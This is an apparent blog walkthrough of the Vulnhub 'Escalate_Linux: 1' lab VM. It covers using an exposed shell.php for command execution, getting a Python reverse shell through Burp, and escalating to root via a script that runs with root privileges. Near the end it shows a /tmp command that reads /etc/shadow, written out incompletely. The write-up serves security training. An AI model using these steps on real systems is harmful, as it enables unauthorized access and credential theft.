Vulnhub Escalate_Linux: 1 Walkthrough

    There are a few new releases on Vulnhub and the one I'm writing about today claims there are 12 avenues for privilege escalation.  Honestly, I'm not interested in finding 12 different privilege escalations.  I have the patience and the time for one.  I figured with that many avenues, this would be over quickly.  I appreciate the effort but I'm one and done on this box.

    If you're on the hunt for all 12, I've got a few hints in the screenshots.  I would also look at cron because I seem to recall seeing something there as well when I was hunting around post root.  

    Anyway, kicking off with Nmap:

    Quite a lot of output so I broke it up into two:

    While I was running fuzzing tools on port 80, I started poking around at SMB.  I found this:

    Couldn't access it with the Guest account and then I moved on and never came back.  Could be something there.

    Our Gobuster output uncovers:

    shell.php -- looks interesting:

    I have an idea as to what to do here:

    Cool.  We can execute commands.  Except I tried to run something with a little more length to it and it didn't like it so I started to URL encode with Burp and that seemed to do the trick:

    Prior to going for the shell, I just want to run wget to see if I can make outbound connections. 

    Feeding our URL encoded command into Repeater:

    With a handler setup:

    Excellent!  We catch the inbound connection. 

    Let's see if Python is installed:

    Feeding our data into Repeater:

    Checking the output window:


    Now for a Python reverse shell:

    Feeding it into Repeater:

    With our handler setup:

    When I clean up the shell, I'm getting double characters which is annoying.  We can clean that up with:

    stty raw -echo

    Checking out /etc/passwd

    Bunch of users which I'm sure is one big giant troll to get 12 privilege escalations.  

    But with all of those users, I wonder if we can gather some information from .bash_history files:

    I clipped off a bunch of the lines but if you're interested in more roots, you'll want to parse through it.  There are some juicy bits in there.

    Based on the above output, I wondered if there were some incorrect permissions set:

    We find a couple of scripts that run with root privileges.  

    If you attempt to run /home/user3/shell from outside of the user's directory, it won't work because it calls the file which also resides in that directory. 

    But if you're in the directory:

    ... it's able to call the file which then runs bash as root and therefore makes you root.  #GameOver

    You could abuse this shell command by creating your own file in /tmp and then run /home/user3/shell

    For example:

    cd /tmp
    echo "cat /etc/shadow" >> ./

    It should produce the contents of the shadow file.  You could also modify or overwrite the shadow file.  

    Anyway, my time is up.  Hope this helps.

    © 2020